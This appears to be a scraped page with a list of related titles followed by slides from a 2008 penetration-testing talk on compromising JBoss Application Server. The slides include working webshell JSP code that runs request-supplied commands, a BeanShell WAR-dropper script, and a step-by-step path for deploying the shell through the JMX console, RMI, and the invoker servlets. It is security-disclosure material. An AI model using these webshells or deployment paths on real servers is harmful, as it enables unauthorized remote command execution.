Bridging the Gap between the Enterprise and You. Who s the JBoss now?



Similar documents
Bridging the Gap between the Enterprise and You or Who s the JBoss now?

Hacking (and securing) JBoss AS

JBoss SOAP Web Services User Guide. Version: M5

Abusing JBoss. Christian Papathanasiou. April 1 st, 2010

JBS-102: Jboss Application Server Administration. Course Length: 4 days

Oracle WebLogic Foundation of Oracle Fusion Middleware. Lawrence Manickam Toyork Systems Inc

Install guide for Websphere 7.0

PowerTier Web Development Tools 4

Enterprise Content Management System Monitor. How to deploy the JMX monitor application in WebSphere ND clustered environments. Revision 1.

Web Application Architecture (based J2EE 1.4 Tutorial)

Tomcat 5 New Features

Oracle WebLogic Server 11g: Administration Essentials

Workshop for WebLogic introduces new tools in support of Java EE 5.0 standards. The support for Java EE5 includes the following technologies:

Oracle EXAM - 1Z Java EE 6 Web Services Developer Certified Expert Exam. Buy Full Product.

Operations and Monitoring with Spring

Java Application Server Guide. For Version 10.3 or Later

Glassfish, JAVA EE, Servlets, JSP, EJB

Oracle WebLogic Server 11g Administration

CHAPTER 1 - JAVA EE OVERVIEW FOR ADMINISTRATORS

Working with WebSphere 4.0

Java Management Extensions (JMX) and IBM FileNet System Monitor

Module 13 Implementing Java EE Web Services with JAX-WS

Top Weblogic Tasks You can Automate Now

JobScheduler Security

JBoss AS Administration Console User Guide. by Shelly McGowan and Ian Springer

BIRT Application and BIRT Report Deployment Functional Specification

Installation Guide for contineo

NetBeans IDE Field Guide

Oracle WebLogic Server: Remote Monitoring and Management

This training is targeted at System Administrators and developers wanting to understand more about administering a WebLogic instance.

Moving beyond hardware

Don t get it right, just get it written.

An Introduction to Globus Toolkit 3

Building Java Servlets with Oracle JDeveloper

Web Development on the SOEN 6011 Server

Deploying Intellicus Portal on IBM WebSphere

GlassFish v3. Building an ex tensible modular Java EE application server. Jerome Dochez and Ludovic Champenois Sun Microsystems, Inc.

As you learned about in Chapter 1, WebSphere Application Server V6 supports the

Introduction to WebSphere Administration

Sample copy. Introduction To WebLogic Server Property of Web 10.3 Age Solutions Inc.

BlackBerry Enterprise Service 10. Version: Configuration Guide

WebLogic Server: Installation and Configuration

In this chapter, we lay the foundation for all our further discussions. We start

WebSphere Training Outline

Course Name: Course in JSP Course Code: P5

Converting Java EE Applications into OSGi Applications

How To Understand The Architecture Of An Ulteo Virtual Desktop Server Farm

Robert Honeyman

HP Process Automation v6 Architecture/Technologies

Business Process Management

Learn Oracle WebLogic Server 12c Administration For Middleware Administrators

Course Description. Course Audience. Course Outline. Course Page - Page 1 of 5

What Is the Java TM 2 Platform, Enterprise Edition?

1Z Oracle Weblogic Server 11g: System Administration I. Version: Demo. Page <<1/7>>

Weblogic Server Administration Top Ten Concepts. Mrityunjay Kant, AST Corporation Scott Brinker, College of American Pathologist

Magento Search Extension TECHNICAL DOCUMENTATION

5 Days Course on Oracle WebLogic Server 11g: Administration Essentials

WebSphere Server Administration Course

IBM WebSphere Server Administration

Struts 2 - Practical examples

Deployment and Monitoring. Pascal Robert MacTI

AXIOM 4 AXIOM SERVER GUIDE

Getting Started with Web Applications

Blackboard Learn TM, Release 9 Technology Architecture. John Fontaine

Crawl Proxy Installation and Configuration Guide

Serving tn5250j in Web Documents from the HTTP Server for iseries

WEBLOGIC ADMINISTRATION

T320 E-business technologies: foundations and practice

How to Build an E-Commerce Application using J2EE. Carol McDonald Code Camp Engineer

Deploying Oracle Business Intelligence Publisher in J2EE Application Servers Release

Understanding class paths in Java EE projects with Rational Application Developer Version 8.0

Server Setup and Configuration

Put a Firewall in Your JVM Securing Java Applications!

A Sample OFBiz application implementing remote access via RMI and SOAP Table of contents

Volume SYSLOG JUNCTION. User s Guide. User s Guide

Application Notes for Packaging and Deploying Avaya Communications Process Manager Sample SDK Web Application on a JBoss Application Server Issue 1.

HOL Beat the Beast: Java Performance Problem Tracking with Open Source Tools

Monitoring Oracle Enterprise Performance Management System Release Deployments from Oracle Enterprise Manager 12c

A technical guide for monitoring Adobe LiveCycle ES deployments

OpenSSO Monitoring Euro User Groups Winter 2010

Oracle Exam 1z0-102 Oracle Weblogic Server 11g: System Administration I Version: 9.0 [ Total Questions: 111 ]

GlassFish Security. open source community experience distilled. security measures. Secure your GlassFish installation, Web applications,

Oracle WebLogic Server

How To Protect Your Computer From Being Hacked On A J2Ee Application (J2Ee) On A Pc Or Macbook Or Macintosh (Jvee) On An Ipo (J 2Ee) (Jpe) On Pc Or

Clustering Guide. Authors

WebsitePanel Installation Guide

Securing your Apache Tomcat installation. Tim Funk November 2009

Sonatype CLM Enforcement Points - Continuous Integration (CI) Sonatype CLM Enforcement Points - Continuous Integration (CI)

EVALUATION ONLY. WA2088 WebSphere Application Server 8.5 Administration on Windows. Student Labs. Web Age Solutions Inc.

Solutions for detect, diagnose and resolve performance problems in J2EE applications

Configuring BEA WebLogic Server for Web Authentication with SAS 9.2 Web Applications

The presentation explains how to create and access the web services using the user interface. WebServices.ppt. Page 1 of 14

Penetration from application down to OS

JAVA WEB START OVERVIEW

Metalogix Replicator. Quick Start Guide. Publication Date: May 14, 2015

Java-technology based projects

The JBoss 4 Application Server Clustering Guide

Transcription:

or Who s the JBoss now? Patrick Hof (patrick.hof@redteam-pentesting.de) Jens Liebchen (jens.liebchen@redteam-pentesting.de) RedTeam Pentesting GmbH http://www.redteam-pentesting.de October, 23rd, Luxembourg hack.lu 2008

Who we are Who we are not RedTeam Pentesting, Dates and Facts Founded 2004 in Aachen, Germany Specialisation exclusively on penetration tests Worldwide realisation of penetration tests Research in the IT security field

Who we are Who we are not Who we are not Java (Enterprise) experts J2EE is not for the faint of heart Example code mostly written in JRuby... JBoss Application Server experts JBoss AS is some seriously scary enterprise stuff We still haven t figured out half of it But we know how to get a webshell running, that ll do ;)

Overview Component Relationships Why JBoss AS as a target? JBoss AS Overview JBoss Application Server is the open source implementation of the Java EE suite of services.[... ] It s easy-to-use server architecture and high flexibility makes JBoss the ideal choice for users just starting out with J2EE, as well as senior architects looking for a customizable middleware platform. (JBoss AS Installation and Getting Started Guide)

Overview Component Relationships Why JBoss AS as a target? JBoss AS Overview Source: http://www.jboss.org/projects/

Overview Component Relationships Why JBoss AS as a target? JBoss Component Relationships Source: JBoss 4.2.2beta Configuration Guide

Overview Component Relationships Why JBoss AS as a target? Why JBoss AS? Why is the JBoss Application Server interesting as a target? Enterprise software Complex Widespread use

Testing Environment All examples were tested under the following conditions: JBoss AS Version: 4.2.3.GA (latest stable community edition) Configuration based on the default config shipped with JBoss AS (with increasingly restricted access) Exposure to the outside world by binding the JBoss AS to all interfaces: -b 0.0.0.0

Objective: Code Execution We want code execution on the JBoss AS Easiest way: Deploy a WAR (Web ARchive) redteam.war -- META-INF -- MANIFEST.MF -- WEB-INF -- web.xml -- redteam-shell.jsp

redteam-shell.jsp Introduction 1 <%@ page import= j a v a. u t i l., j a v a. i o. %> 2 <% 3 i f ( r e q u e s t. g e t P a r a m e t e r ( cmd )!= n u l l ) { 4 S t r i n g cmd = r e q u e s t. g e t P a r a m e t e r ( cmd ) ; 5 P r o c e s s p = Runtime. getruntime ( ). e x e c (cmd ) ; 6 OutputStream os = p. getoutputstream ( ) ; 7 I n p u t S t r e a m i n = p. g e t I n p u t S t r e a m ( ) ; 8 DataInputStream d i s = new DataInputStream ( i n ) ; 9 S t r i n g d i s r = d i s. r e a d L i n e ( ) ; 10 w h i l e ( d i s r!= n u l l ) { 11 out. p r i n t l n ( d i s r ) ; 12 d i s r = d i s. r e a d L i n e ( ) ; 13 } 14 } 15 %>

web.xml Introduction 1 <?xml v e r s i o n= 1. 0?> 2 <web app 3 xmlns= h t t p : // j a v a. sun. com/ xml / ns / j 2 e e 4 x m l n s : x s i= h t t p : //www. w3. org /2001/XMLSchema i n s t a n c e 5 x s i : s c h e m a L o c a t i o n= h t t p : // j a v a. sun. com/ xml / ns / j 2 e e 6 h t t p : // j a v a. sun. com/ xml / ns / j 2 e e / 7 web app 2 4. xsd 8 v e r s i o n= 2. 4 > 9 < s e r v l e t> 10 <s e r v l e t name>redteam S h e l l</ s e r v l e t name> 11 <j s p f i l e> 12 / redteam s h e l l. j s p 13 </ j s p f i l e> 14 </ s e r v l e t> 15 </web app>

Live view of the JBoss AS Direct access to the server s JMX microkernel and components Modify configuration, start/stop components, run MBean methods etc.

JBoss AS Deployment MBeans The Deployment MBeans install the different types of supported component files: EAR, WAR, EJB... Most interesting Deployment MBeans (for now): MainDeployer Entry point for JBoss deployments. Delegates given deployable archives to the responsible subdeployer. URLDeploymentScanner JBoss hot deployment service. Watches one or more URLs for deployable archives and deploys them as they become available or change.

Introduction Demo

Introduction What can we do if the is password protected?

Introduction What can we do if the is password protected? Ok, first, try admin/admin...

Java Remote Method Invocation Perform method invocations on remote Java objects JNDI: Java Naming and Directory Interface Used by RMI to look up objects If the JBoss RMI components are available, instead of using the, we can control all JBoss MBeans via RMI. Default ports to scan for: 4444 RMI, 1098-1099 Naming

Twiddle Introduction Writing your own Java programs (ab)using RMI is error prone and boring. Twiddle to the rescue sh jboss-4.2.3.ga/bin/twiddle.sh -h A JMX client to twiddle with a remote JBoss server. usage: twiddle.sh [options] <command> [command_arguments]

Twiddle Introduction Demo

Sometimes, the JBoss AS may not have the rights to initiate outbound connections, e.g. due to firewall restrictions. Not possible to deploy from an external URL anymore

Sometimes, the JBoss AS may not have the rights to initiate outbound connections, e.g. due to firewall restrictions. Not possible to deploy from an external URL anymore So, how can we upload our WAR file to the server?

The BSH Deployer, or BeanShell Deployer allows you to deploy one-time execution scripts or even services in JBoss. Scripts are plain text files with a.bsh extension and can even be hot-deployed. This gives you scripting access inside the JBoss server. (https://www.jboss.org/community/docs/doc-9131)

Class BeanShellSubDeployer From the JBoss Class BeanShellSubDeployer Javadoc: p u b l i c URL c r e a t e S c r i p t D e p l o y m e n t ( S t r i n g b s h S c r i p t, S t r i n g scriptname ) throws org. j b o s s. deployment. DeploymentException Create a bsh deployment given the script content and name. This creates a temp file using File.createTempFile(scriptName, ".bsh") and then deploys this script via the main deployer.

Beanshell Script (with Newlines) 1 import j a v a. i o. F i l e O u t p u t S t r e a m ; 2 import sun. misc. BASE64Decoder ; 3 4 // Base64 encoded redteam. war 5 S t r i n g v a l = UEsDBBQACA [... ] AAAAA ; 6 7 BASE64Decoder d e c o d e r = new BASE64Decoder ( ) ; 8 byte [ ] b y t e v a l = d e c o d e r. d e c o d e B u f f e r ( v a l ) ; 9 F i l e O u t p u t S t r e a m f s t r e a m = new F i l e O u t p u t S t r e a m ( 10 /tmp/ redteam. war ) ; 11 f s t r e a m. w r i t e ( b y t e v a l ) ; 12 f s t r e a m. c l o s e ( ) ;

Beanshell Script (with Newlines) 1 import j a v a. i o. F i l e O u t p u t S t r e a m ; 2 import sun. misc. BASE64Decoder ; 3 4 // Base64 encoded redteam. war 5 S t r i n g v a l = UEsDBBQACA [... ] AAAAA ; 6 7 BASE64Decoder d e c o d e r = new BASE64Decoder ( ) ; 8 byte [ ] b y t e v a l = d e c o d e r. d e c o d e B u f f e r ( v a l ) ; 9 F i l e O u t p u t S t r e a m f s t r e a m = new F i l e O u t p u t S t r e a m ( 10 /tmp/ redteam. war ) ; 11 f s t r e a m. w r i t e ( b y t e v a l ) ; 12 f s t r e a m. c l o s e ( ) ; Deploy /tmp/redteam.war via MainDeployer Voilà

Introduction Demo

Web-Console Introduction Until now, we needed either an open or RMI What if a) The is password protected b) RMI is not available / everything besides the JBoss Webserver is firewalled? Let s have a look at the Web-Console

Web-Console Combination of an applet and HTML view of the JMX microkernel and components MBean links go to the Applet has some additional capabilities (e.g. monitoring JMX attributes with real-time graphs)

Open Web-Console Only Information Disclosure?

Open Web-Console Only Information Disclosure? Wrong

Servlet The Web-Console applet s monitoring tools use a JMX InvokerServlet for their functionality Class org.jboss.console.remote.invokerservlet, mapped to /web-console/invoker The InvokerServlet is not restricted to monitoring functions, but is a general purpose JMX Invoker We can send arbitrary JMX commands to the servlet

$ j r u b y 1. 0 w e b c o n s o l e i n v o k e r. rb h Usage : w e b c o n s o l e i n v o k e r. rb [ o p t i o n s ] MBean u, u r l URL The I n v o k e r URL to use ( d e f a u l t : h t t p : / / l o c a l h o s t : 8 080/ web c o n s o l e / I n v o k e r ) a, get a t t r ATTR Read an a t t r i b u t e o f an MBean i, i n v o k e METHOD i n v o k e an MBean method p, i n v o k e params PARAMS MBean method params s, i n v o k e s i g s SIGS MBean method s i g n a t u r e t, t e s t Test t h e s c r i p t w i t h t h e S e r v e r I n f o MBean h, h e l p Show t h i s h e l p Example usage : w e b c o n s o l e i n v o k e r. rb a OSVersion j b o s s. system : t y p e=s e r v e r I n f o w e b c o n s o l e i n v o k e r. rb i listthreaddump j b o s s. system : t y p e=s e r v e r I n f o w e b c o n s o l e i n v o k e r. rb i l i s t M e m o r y P o o l s p t r u e s b o o l e a n j b o s s. system : t y p e=s e r v e r I n f o

web-console/invoker Introduction Demo

That was fun. But what if a) The is password protected b) RMI is not available / everything besides the JBoss Webserver port is firewalled c) The Web-Console is password protected?

That was fun. But what if a) The is password protected b) RMI is not available / everything besides the JBoss Webserver port is firewalled c) The Web-Console is password protected? Don t give up so early. There s still one JMX Invoker left...

JBoss makes it possible to do RMI/Naming over HTTP (HttpAdaptor) This is not enabled by default But: The JMX Invoker Servlet for this service is up and running Class org.jboss.invocation.http.servlet.invokerservlet, mapped to /invoker/ We can send arbitrary JMX commands to the servlet. Again.

Introduction No example script for this one (insert rant about too little time) For demonstration purposes, we go the easy route: 1. Set up a JBoss instance with enabled HttpAdaptor for RMI over HTTP 2. Write a short program sending the JMX command(s) we need 3. Sniff the HTTP POST request to the and save it for later replaying

Introduction Demo

How to deploy your own WAR file on a JBoss Application Server:

How to deploy your own WAR file on a JBoss Application Server: open?

How to deploy your own WAR file on a JBoss Application Server: open? Deployment via web browser

How to deploy your own WAR file on a JBoss Application Server: open? Deployment via web browser password protected?

How to deploy your own WAR file on a JBoss Application Server: open? Deployment via web browser password protected? Deployment via RMI

How to deploy your own WAR file on a JBoss Application Server: open? Deployment via web browser password protected? Deployment via RMI No outbound connections allowed for JBoss AS? Deployment via

How to deploy your own WAR file on a JBoss Application Server: open? Deployment via web browser password protected? Deployment via RMI No outbound connections allowed for JBoss AS? Deployment via RMI closed/firewalled?

How to deploy your own WAR file on a JBoss Application Server: open? Deployment via web browser password protected? Deployment via RMI No outbound connections allowed for JBoss AS? Deployment via RMI closed/firewalled? Deployment via /web-console/invoker

How to deploy your own WAR file on a JBoss Application Server: open? Deployment via web browser password protected? Deployment via RMI No outbound connections allowed for JBoss AS? Deployment via RMI closed/firewalled? Deployment via /web-console/invoker Web-Console password protected?

How to deploy your own WAR file on a JBoss Application Server: open? Deployment via web browser password protected? Deployment via RMI No outbound connections allowed for JBoss AS? Deployment via RMI closed/firewalled? Deployment via /web-console/invoker Web-Console password protected? Deployment via /invoker/

The JBoss Application Server is not a kid s toy, although it is deceptively easy to set up. Read The Fine Manual. Really. Especially Securing JBoss! https://www.jboss.org/community/docs/doc-12188

Questions? Thanks for your attention